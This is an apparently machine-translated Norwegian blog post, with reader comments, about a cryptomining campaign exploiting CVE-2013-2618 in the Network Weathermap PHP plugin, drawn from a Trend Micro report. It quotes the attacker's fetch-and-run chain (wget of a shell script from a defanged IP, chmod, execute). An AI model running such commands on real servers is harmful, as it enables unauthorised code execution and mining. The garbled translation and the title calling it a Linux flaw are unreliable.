5-års Linux-feil tillater angripere å utvide kryptovalutaer

linux krasj

Dette fra kryptovalutearbeideren med bruk av eksterne datamaskiner uten autorisasjon av eierne av disse blir en trend. Jeg hadde allerede snakket om dette ved noen anledninger her på bloggen om denne typen situasjoner.

Og det er at dette allerede har blitt helt ute av kontroll fra det øyeblikket kryptovalutaer har tatt ganske betydelig plass og verdi, har folk med nok kunnskap til å få tilgang til datamaskiner som bryter sikkerheten deres, å kaste bort tid på å lete etter viktig informasjon eller bankkontoer for å oppnå en økonomisk fordel.

I stedet for å gjøre dette velger de det enkleste å ta kontroll over disse lagene og forene dem i et gruvedriftnettverk og også for andre oppgaver som de ofte gjør med et botnet.

På denne måten er det vanligvis mer å omnummerere deg, de fokuserer bare på øyeblikkelige penger som dette genererer.

Med smart forståelse av markedstrender og riktig kunnskap om kryptohandel, kan man høste store fordeler.

Er Linux virkelig et sikkert system?

Mange av oss har ideen om at Linux er et nesten perfekt sikkert operativsystem. Realiteten er at den fremdeles har noen feil.

Vel harnoen dager gjorde TrendMicro et funn, der avslørt en ny feil i Linux-systemer som ga hackere fordelen ved å utvinne kryptovalutaer bruker Linux-servere og maskiner.

I en uttalelse gjennom bloggen din de kommenterte følgende:

Gjennom vår overvåking relatert til hendelsesrespons observerte vi innbruddsforsøk hvis indikatorer vi var i stand til å korrelere med en tidligere gruvedrift-kampanje for kryptovaluta som brukte JenkinsMiner-skadelig programvare.

Forskjellen: denne kampanjen er rettet mot Linux-servere. Det er også et klassisk tilfelle av gjenbrukte sårbarheter, da det utnytter en utdatert sikkerhetsfeil hvis oppdateringen har vært tilgjengelig i nesten fem år.

I denne utgivelsen gjennom analysen din klarte å identifisere de berørte nettstedene for denne feilen det Det påvirker hovedsakelig Japan, Taiwan, Kina, USA og India.

Angrepsanalyse

Gjennom analyse av Trend Micro Smart Protection Network detalj litt om hvordan angripere utnytter denne feilen:

Operatørene av denne kampanjen utnyttet CVE-2013-2618, en datert sårbarhet i Camapi Network Weathermap plugin, som systemadministratorer bruker for å visualisere nettverksaktivitet.

Når det gjelder hvorfor de utnytter en gammel sikkerhetsfeil: Network Weathermap har bare to offentlig rapporterte sårbarheter så langt, begge fra juni 2014.

Disse angriperne kan dra nytte av ikke bare en sikkerhetsfeil som en utnyttelse er tilgjengelig for, men også patchforsinkelsen som oppstår i organisasjoner som bruker open source-verktøyet.

utgangspunktet angrepet skjer via et XSS-angrep:

værkart-cryptominer-4

Den uklare delen er angrepsmålet, en webserver med en port.

Filen /plugins/weathermap/configs/conn.php er filen som skyldes det vedvarende XSS-angrepet på / plugins / weathermap / php .

Pluss konn.php I utgangspunktet ser vi en lignende HTTP-forespørsel brukt på en side som heter ' kjøler.php '.

Programmet for gruvedrift av kryptovaluta distribueres gjennom sårbarheten fra PHP-værkartet på mål som er Linux-servere

På bildet kan du se hvordan angrepet genereres, og det beskrives som følger:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

Det den gjør er å sende indikasjonen for å laste ned en fil med wget, som er et verktøy som nesten alle Linux-distribusjoner har installert som standard.

chmod 775 watchd0g.sh

gjør filen kjørbar

./watchd0g.sh

Det den til slutt gjør er å få filen til å kjøre på serveren.

Heldigvis det er allerede en lapp ( CVE-2013-2618 ) tilgjengelig for svikt og Du kan laste den ned fra denne lenken.

Si du vil vite mer om det av denne feilen kan du gå til denne lenken.

Fuente: Cryptocurrency Miner Distribuert via PHP Weathermap Sårbarhet, Targets Linux Servers


5 kommentarer, legg igjen dine

Legg igjen kommentaren

Din e-postadresse vil ikke bli publisert. Obligatoriske felt er merket med *

*

*

  1. Ansvarlig for dataene: Miguel Ángel Gatón
  2. Formålet med dataene: Kontroller SPAM, kommentaradministrasjon.
  3. Legitimering: Ditt samtykke
  4. Kommunikasjon av dataene: Dataene vil ikke bli kommunisert til tredjeparter bortsett fra ved juridisk forpliktelse.
  5. Datalagring: Database vert for Occentus Networks (EU)
  6. Rettigheter: Når som helst kan du begrense, gjenopprette og slette informasjonen din.

  1.   Miguel Mayol i Tur sa

    Å være en idiot er ikke trygt, og til tross for det sparer Linux deg.
    Ikke oppdatering av sikkerhetsoppdateringer er ikke Linuxs feil. Det er feilen at noen selskaper, for å spare penger, ansetter idioter som systemadministratorer,
    Men allikevel blir det OPPDAGET UMIDDELBART og løses med en gang, til og med enhver mindre sikkerhetshendelse som denne blir publisert.

  2.   Jeg vil ha en villa som eldekoletas sa

    Og hvilken feil har Linux at oppdateringene ikke blir brukt? GNU / Linux-utviklere oppfyller sitt oppdrag ved å utvikle løsninger for nye sårbarheter og gjøre dem tilgjengelige for brukere. Hvis legen foreskriver en influensavaksine og du ikke får den, blir du syk og stiv ... er det legens feil?

  3.   Bill sa

    DesdeLinux no es lo que era, dos noticias seguidas con dos fallos importantes:
    1.- I bedre redaktører for å utvikle setter de en som ikke er gratis programvare, og de glemmer andre som er (de er sitert i kommentarene).
    2. - Fantastiske nyheter om virus når de bare påvirker IKKE OPPDATERTE servere. Men hvis noen linux har blitt oppdatert som standard i flere tiår. For å sette frykt som om det var behov for et sugende antivirus i Windows-stil. De ser ut til å prøve å si at Linux er det samme som Windows og ikke.
    Hvis en feil er gammel og allerede har blitt lappet, er det verken nyheter eller ingenting. Ikke spill Microsoft og antivirusfirmaer som Trend Micro, Norton, Panda eller McAffee, eller få betalt.
    Forresten, vi brukte Trend Micro i flere år i selskapet, og det var en skikkelig potet, en dritt, fordi systemet sa at en kjørbar hadde "spor" av virus (noe som kan være et virus, selv om det var ikke) og hvorfor den fjernet den (den førte den til en katalog slik at den ikke skulle kjøre) og tillot ikke bruk, og den hadde ingen hviteliste for å oppheve blokkeringen av denne oppførselen med en sikker kjørbar fil som vi trengte å bruke. For et rot. Det var bedriftsversjonen, den enkelte versjonen hadde denne hvitelistemuligheten. Patetisk.

  4.   Bill sa

    Ikke beskriv deg selv så elegant.
    Artikkelen snakker om et sikkerhetshull som lar deg gå inn i et program, gjøre det kjørbart og kjøre det, som er sikkerhetshullet som hvert virus trenger å spre, åpenbart for å være et virus som det trenger at programmet du har har i koden. muligheten for å skanne datamaskiner på nettverket for å gjenta operasjonen og selvkopiere. De gjør ikke akkurat dette fordi i Linux er sikkerhetshullene oppdaget dekket av en sikkerhetsoppdatering, og det er det jeg mener med forskjellen mellom Windows og Linux, siden et antivirusprogram ikke er nødvendig, men for å dekke hullet. I Windows er det vanskeligere av flere grunner: 1. - Filene kan kjøres bare på grunn av utvidelsen, og eliminerer et trinn for introduksjonen på den berørte datamaskinen. 2.- Brukere installerer kontinuerlig programmer med tvilsom opprinnelse fordi de er proprietære og trenger å ha dem uten å betale (jeg sier ikke noe hva det ville være for en hjemmeøkonomi å kjøpe MS Office, Photoshop, ... mer enn å doble kostnadene for datautstyret). 3.- Før eller siden vil Windows tømme, brukeren tar det til naboen, vennen, ... som for ikke å kaste bort tid formaterer alt og installerer den ultimate Windows med aktiveringsoppdatering som ikke er oppdatert eller som selve oppdateringen setter et spionprogram. Det kan være at det ikke er, og det er flott, men det kan være at det er, og du har en Windows som spionerer på passordene dine. I artikkelen nevner de introduksjonssystemet i en Linux som er berørt av sårbarheten, noe som gjør at programmet som automatisk skanner nettverket og bruker det til å kopiere seg selv og kjøre på serveren, er den enkleste delen av alle, av den grunn kommenterte i artikkelen er det viktigste trinnet for ethvert virus: å vite sårbarheten til systemet for å angripe.

  5.   hambaglio sa

    Dårlig informasjon. Dette er ikke en feil i Linux, det er en feil i en PHP-APPLIKASJON, det vil si at den er på tvers av plattformer. Det er ikke engang eksklusivt for systemer som kjører Linux-kjernen! Men selv om applikasjonen ikke var tverrplattform, ville det ikke være en Linux-feil, det ville bare være et program.

    Linux-kjernen har ikke den minste forstyrrelse i å beskytte mot skriptangrep på tvers av nettsteder som denne. I det minste undersøk FEM MINUTTER før du legger ut fordi sannheten at for alle som vet litt om noe, vil du se dårlig ut.